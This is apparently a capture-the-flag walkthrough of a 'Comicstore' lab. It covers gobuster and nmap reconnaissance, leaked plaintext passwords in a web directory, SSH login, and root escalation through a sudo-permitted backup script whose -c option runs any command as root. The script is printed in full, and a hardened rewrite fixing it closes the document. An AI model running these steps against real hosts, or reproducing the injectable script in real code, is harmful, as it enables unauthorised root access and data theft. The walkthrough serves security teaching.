Comicstore Lab
The person who runs a comic store claims to have a rare collection, but engages in misleading behavior. He makes false promises to customers, such as exchanging comics or selling them for cash, which he never fulfills. This behavior raises concerns about the legitimacy of this rare comic book collection. Furthermore, his habit of regularly backing up MP3 files suggests a tech-savvy approach and possibly a sophisticated structure to his fraudulent activities. These allegations should be investigated to confirm the veracity of the rare comic book collection claims and to protect potential victim customers from this scam. Investigate and report back!
What could be a potential username?
- Visiting the target website, the contact section shows an email address:
johnny@comicstore.hv
==> The Answer : johnny
Looks like the admin has left a note for himself. What is the password?
- Use gobuster to scan for directories:
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u http://comicstore.hv/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://comicstore.hv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/_notes (Status: 301) [Size: 315] [--> http://comicstore.hv/_notes/]
/0 (Status: 200) [Size: 28710]
/admin (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-admin/]
/atom (Status: 200) [Size: 23215]
/dashboard (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-admin/]
/embed (Status: 200) [Size: 28710]
/favicon.ico (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-includes/images/w-logo-blue-white-bg.png]
/feed (Status: 200) [Size: 21857]
/index.php (Status: 200) [Size: 28710]
/javascript (Status: 301) [Size: 319] [--> http://comicstore.hv/javascript/]
/login (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-login.php]
/page1 (Status: 200) [Size: 28710]
/rdf (Status: 200) [Size: 20776]
/robots.txt (Status: 200) [Size: 67]
/rss (Status: 200) [Size: 4103]
/rss2 (Status: 200) [Size: 21857]
/server-status (Status: 403) [Size: 278]
/wp-admin (Status: 301) [Size: 317] [--> http://comicstore.hv/wp-admin/]
/wp-content (Status: 301) [Size: 319] [--> http://comicstore.hv/wp-content/]
/wp-includes (Status: 301) [Size: 320] [--> http://comicstore.hv/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- Based on the question, I guessed the answer would be in the /_notes directory.
- Open it:
Index of /_notes
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[TXT] secret.txt 2024-03-03 04:05 371
[TXT] securepasswords.txt 2024-03-06 12:05 148
[TXT] shopping_list.txt 2024-03-03 04:04 418
[TXT] todo.txt 2024-03-06 11:56 151
Apache/2.4.57 (Debian) Server at comicstore.hv Port 80
- Read securepasswords.txt:
warthunder forum: 920312036099
my dota account: KR9ZT@Z
my ssh account: bl4z3
reddit alt-account: 2367ruest-emile
steam community: trustno11still07
==> The Answer : bl4z3
What is the name of the directory where comic books are kept?
- Scan the target with nmap:
┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- comicstore.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-14 05:57 CST
Nmap scan report for comicstore.hv (172.20.38.153)
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 f1:d3:3d:0e:44:58:c2:6e:7c:32:e2:9f:aa:d4:32:40 (ECDSA)
|_ 256 10:6f:37:a1:79:c5:15:08:9c:23:44:ea:24:10:84:27 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Comic Store
|_http-generator: WordPress 6.5.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 52:54:00:15:5F:E4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.39 seconds
- SSH is open on the target, so I tried logging in with the username and password obtained above. Looking in ~/Documents/ turned up the answer:
┌─[root@hackerbox]─[~]
└──╼ #ssh johnny@comicstore.hv
The authenticity of host 'comicstore.hv (172.20.38.153)' can't be established.
ED25519 key fingerprint is SHA256:XUdI31RGtG8inWKt+WeBf6FOHNVHrCANnBe35cCyy4k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'comicstore.hv' (ED25519) to the list of known hosts.
johnny@comicstore.hv's password:
Linux comicstore 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
johnny@comicstore:~$
johnny@comicstore:~$ ls
Desktop Documents Music Public Videos
johnny@comicstore:~$ cd Documents/
johnny@comicstore:~/Documents$ ls
myc0ll3ct1on
johnny@comicstore:~/Documents$
==> The Answer : myc0ll3ct1on
What is the name of the script that is used for backing up mp3 files?
- I looked for a way to escalate privileges, thinking the backup would be in /root:
johnny@comicstore:~$ getcap -r / 2>/dev/null
johnny@comicstore:~$ sudo -l
Matching Defaults entries for johnny on comicstore:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User johnny may run the following commands on comicstore:
(root) NOPASSWD: /opt/.securebak/backup_mp3.sh
johnny@comicstore:~$ ^C
johnny@comicstore:~$
==> The Answer : backup_mp3.sh
What is the name of the richest person in the Scamlist.csv file?
- I went to read scamlist.csv, but only root can view it:
johnny@comicstore:~$ ls
Desktop Documents Music Public Videos
johnny@comicstore:~$ cd Documents/
johnny@comicstore:~/Documents$ ls
myc0ll3ct1on
johnny@comicstore:~/Documents$ cd myc0ll3ct1on/
johnny@comicstore:~/Documents/myc0ll3ct1on$ ls
notetomyself.txt NotSoRare.cba Rare.cba scamlist.csv SuperRare.cba VeryRare.cba
johnny@comicstore:~/Documents/myc0ll3ct1on$ cat scamlist.csv
cat: scamlist.csv: Permission denied
johnny@comicstore:~/Documents/myc0ll3ct1on$
johnny@comicstore:~/Documents/myc0ll3ct1on$ ls -la
total 49168
drwxr-xr-x 2 root root 4096 May 2 2024 .
drwxr-xr-x 3 johnny johnny 4096 Feb 18 2024 ..
-rw-r--r-- 1 johnny johnny 226 Mar 3 2024 notetomyself.txt
-rw-r--r-- 1 johnny johnny 10485760 Feb 18 2024 NotSoRare.cba
-rw-r--r-- 1 johnny johnny 12582912 Feb 18 2024 Rare.cba
-rw------- 1 root root 274 May 2 2024 scamlist.csv
-rw-r--r-- 1 johnny johnny 13631488 Feb 18 2024 SuperRare.cba
-rw-r--r-- 1 johnny johnny 13631488 Feb 18 2024 VeryRare.cba
johnny@comicstore:~/Documents/myc0ll3ct1on$
- Recalling sudo -l: the current user johnny can run /opt/.securebak/backup_mp3.sh with sudo.
- That is the escalation target :))).
- Read the contents of backup_mp3.sh:
johnny@comicstore:/opt/.securebak$ cat backup_mp3.sh
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee -a /run/media/johnny/BACKUP/backedup.txt
# archive file to keep track of files
input="/run/media/johnny/BACKUP/backedup.txt"
while getopts c: flag; do
case "${flag}" in
c) command=${OPTARG};;
esac
done
backup_files="/home/johnny/Music/song*.mp3"
# backup location
dest="/run/media/johnny/BACKUP"
# archive filename.
hostname=$(hostname -s)
archive_file="$hostname-bak.tar.gz"
# print starting message
echo "Backing up $backup_files to $dest/$archive_file" && echo
# backing up the files
tar czf $dest/$archive_file $backup_files
# print ending message
echo && echo "Backup finished"
cmd=$($command) && echo $cmd
johnny@comicstore:/opt/.securebak$
- My rough understanding: it uses find to locate every file ending in .mp3 and appends the list to /run/media/johnny/BACKUP/backedup.txt. It also has a -c option that takes a command, which the last line runs via $($command); since the script itself runs as root through sudo, that command runs as root too. This is the key to getting root (I did not dig into the script much; if you have questions you can ask DeepSeek AI or another AI!).
johnny@comicstore:~/Documents/myc0ll3ct1on$ pwd
/home/johnny/Documents/myc0ll3ct1on
johnny@comicstore:~/Documents/myc0ll3ct1on$ sudo -l
Matching Defaults entries for johnny on comicstore:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User johnny may run the following commands on comicstore:
(root) NOPASSWD: /opt/.securebak/backup_mp3.sh
johnny@comicstore:~/Documents/myc0ll3ct1on$ sudo /opt/.securebak/backup_mp3.sh -c 'cat /home/johnny/Documents/myc0ll3ct1on/scamlist.csv'
tee: /run/media/johnny/BACKUP/backedup.txt: No such file or directory
Backing up /home/johnny/Music/song*.mp3 to /run/media/johnny/BACKUP/comicstore-bak.tar.gz
tar: Removing leading `/' from member names
tar: /home/johnny/Music/song*.mp3: Cannot stat: No such file or directory
tar (child): /run/media/johnny/BACKUP/comicstore-bak.tar.gz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
Backup finished
Name,ComicIssue,Price,Notes
Garey Elwyn,#144,500,A poor student that is hardly worth it.
Rudy Darryl,#64,350,A total comic book nerd.
Emily Randolf,#98,300,This woman is rolling in money
Jones Nick,#32,500,Idk might get more.
Charleen Kayla,#11,300,Buying for her bf.
Raise
johnny@comicstore:~/Documents/myc0ll3ct1on$
==> The Answer : Emily Randolf
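The root cause of the escalation above is the -c option: whatever the caller passes is executed by $($command) with the root privileges sudo grants the script. Below is a hardened rewrite of backup_mp3.sh, added here as an example and not part of the lab or its author's files; it keeps the original job (archive song*.mp3 into <host>-bak.tar.gz and record the file list in backedup.txt) but drops the command option, the nested sudo, the unquoted paths and the silent partial failures. The source and destination directories are passed as arguments instead of being hard-coded, so it can be exercised on any directory.

```shell
#!/bin/sh
# Hardened replacement for the lab's backup_mp3.sh (added example, not the lab's own script).
# Differences from the original: there is no -c option, so no caller-supplied command is
# ever executed; no nested sudo (the script is already root when run via sudo); every path
# is quoted; the destination is checked up front; and any failure aborts the run.
set -eu

# backup_mp3 SRC_DIR DEST_DIR
# Archives SRC_DIR/song*.mp3 into DEST_DIR/<host>-bak.tar.gz and appends the file list to
# DEST_DIR/backedup.txt. The body runs in a subshell so the cd does not leak to the caller
# and "exit" only ends the subshell, i.e. it acts as the function's return status.
backup_mp3() (
    src_dir=$1
    dest=$2
    host=$(hostname -s 2>/dev/null || uname -n)   # uname -n is the POSIX fallback
    archive="$dest/$host-bak.tar.gz"

    # The original lets tee and tar fail halfway through when the backup mount is absent;
    # refuse to start instead.
    if [ ! -d "$dest" ] || [ ! -w "$dest" ]; then
        echo "backup: destination $dest is not a writable directory" >&2
        exit 1
    fi

    # Glob relative to the source so archive members are relative names
    # (no "Removing leading /" warning) and spaces in names survive quoting.
    cd "$src_dir" || exit 1
    set -- song*.mp3
    if [ ! -e "$1" ]; then          # an unmatched glob stays literal: nothing to back up
        echo "backup: no song*.mp3 files in $src_dir" >&2
        exit 1
    fi

    # Keep the inventory the original wrote, but only for files actually archived.
    for f in "$@"; do
        printf '%s/%s\n' "$src_dir" "$f"
    done >> "$dest/backedup.txt"

    tar czf "$archive" -- "$@"
    echo "Backed up $# file(s) from $src_dir to $archive"
)
```

Invoke it as `backup_mp3 /home/johnny/Music /run/media/johnny/BACKUP`; a sudoers rule pointing at this script no longer hands out a root shell, because there is no argument that reaches a command interpreter.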